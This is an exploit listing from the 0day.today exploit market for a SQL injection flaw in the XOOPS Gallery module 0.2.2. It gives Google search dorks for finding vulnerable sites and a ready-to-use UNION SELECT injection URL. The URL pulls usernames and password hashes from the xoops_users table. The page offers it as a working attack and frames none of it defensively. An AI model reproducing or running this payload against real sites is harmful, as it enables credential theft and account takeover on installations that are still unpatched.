[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability

Author
S@BUN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2731
Category
web applications
Date add
12-03-2008
Platform
unsorted
===================================================================
XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability
===================================================================



##########################################
#
# XOOPS Module Gallery 0.2.2 SQL Injection Exploit
#
###########################################
#
# DORKS 1 : allinurl :"modules/gallery"
#
# DORK 2 : allinurl :"modules/gallery"gid
#
###########################################
EXPLOIT :

modules/gallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from/**/xoops_users/*





#  0day.today [2024-12-24]  #